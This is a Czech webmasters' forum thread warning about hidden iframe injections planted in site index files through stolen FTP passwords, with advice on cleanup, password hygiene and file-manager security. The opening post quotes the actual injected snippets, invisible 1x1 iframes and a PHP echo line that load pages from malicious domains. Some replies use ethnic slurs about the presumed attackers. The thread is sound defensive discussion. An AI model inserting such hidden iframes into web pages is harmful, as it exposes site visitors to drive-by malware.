Pozor na hackery !!!!

[platinum]

Několik klientů si stěžovalo.Že se jim změnil web.

Poslední 3-4 dny řádí čínnští hackeři a vkládají do indexů framy s malware.

Pokud někomu zmizela FO nebo máte pocit že se nezobrazuje spravně,Prohlédněte si zdroják.
a jestliže tam najdete podobné kody tomuto:

<iframe src="http://goooogleadsence.biz/?click=2CE0D69" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

nebo

echo "<iframe src=\"http://goooogleadsence.biz/?click=2D26A1C\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

<iframe src="http://superbetfair.cn/in.cgi?income44" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://nameashop.cn/in.cgi?income33" width=1 height=1 style="visibility: hidden"></iframe>

tak je třeba změna hesla k FTP a odstranění těchto kódů ze všech indexů.
Pokud používáte Totalcommander dejte si- hledat text : goooogleadsence. Nebo co budete mít ve framu.
A pak postupně všechny soubory ve kterých vám najte tyto texty (framy) opravit...

Dále mohou soubory obsahovat javascriptový řetězec obsahující v6dnebo v6c dejte vyhledat v6d nebo v6c

Zpravidla to vkládají na konec indexu.php,nebo mezi <body></body>

[Mamejeradi.cz]

K...y sikmooky :-)

Me uz prihlasovaci udaje k ftp zmenil sam hostitel,tak doufam,ze mi tam nevlezou

[Rain3r]

To jsou pěkní sviňáci, strávil jsem tím celé odpoledne a nakonec byl vir i v souboru classes/subdomain.php. tak bacha na to

[moisidis]

Pod pojmem "řádění hackerů" bych si představil to, že napadnou a přímo pozmění stránku na webu. To, že máš zavirovanej počítač, hesla si v FTP klientovi ukládáš a proto ti je číňani ukradli, je něco jinýho.

Dělal jsem stejnou chybu, řešil jsem to 26.3. a PC jsem si infikoval na úvodní straně katalogu olomouckestranky.cz
Přes všechny aktualizace a zabezpečení tam mrcha stejně prolezla. Na pozadí se spustil program 1.exe a pořád dokola se pokoušel o zápis do registrů do seznamu programů spouštěných při startu. Nešel ukončit přes CtrlAltDel, ale naštěstí mně na ty jeho pokusy upozornil Adwatch.

Hočimini mně zapsali IFRAME do indexů (do všech, ve kterých je tag BODY) na dvou mých webech, vždycky hned na začátek BODY. Všude jsem to promazal a za pár dnů to tam bylo znova, protože jsem blbec nezměnil hesla k FTP.

Teď mám hesla jiný, v Commanderu ani ve Filezille si je neukládám, vždycky je tam ručně překopíruju z texťáku a je po problému.

[Bronikus]

Chci jen upozornit, že krom nových hesel je třeba zcela vykopnout z PC i toho slavného Total Commandera. Nejedná se o lokální problém - ale globální!!!! Doporučuji článek viz. níže:

http://svatas.blog.root.cz/2009/04/21/a-total-commander-pouzivate/

[Pajik]

TC je v tom svým způsobem nevinně, i jiné managery souborů by na tom byly stejně jako TC, kdyby byly tak rozšířené, ale holt je moc lidi nepoužívají, tak zatím nejsou pro spamery tak zajímavé. Ostatně v tom článku je naznačeno, a to je fakt, že hlavní chybou je automatické ukládání hesel do čehokoliv bez firewallu a antiviru.
PS - Presta na tom není v tomhle ohledu vůbec lépe než zminovaný TC. Hesla do databáze jsou čitelná téměř i pro slepého. A slavný Outlook Expres, tam hesla a loginy jsou na sítovém snifferu vidět jak na běžícím pásu.

[Lukáš Rejnart]

Je otazkou, zdali pouzivate kvalitni firewall a jedete pokud mozno sifrovane. Nepustit do PC nic z venku.Nepouzivejte M$ utlouk, Internet Exprdel a doporucuju Sunbelt Personal Firewall.

[Bronikus]

Je otazkou, zdali pouzivate kvalitni firewall a jedete pokud mozno sifrovane. Nepustit do PC nic z venku.Nepouzivejte M$ utlouk, Internet Exprdel a doporucuju Sunbelt Personal Firewall.

Tak Outlook používám a u TC jsem také zůstal, jen jsem zvolil neukládání přihlašovacích údajů. Mě se šmejd zapsal do všech index.php vždy na konec. U těchto indexů jsem nastavil atributy na 444 tak uvidíme o co se pokusí příště ...,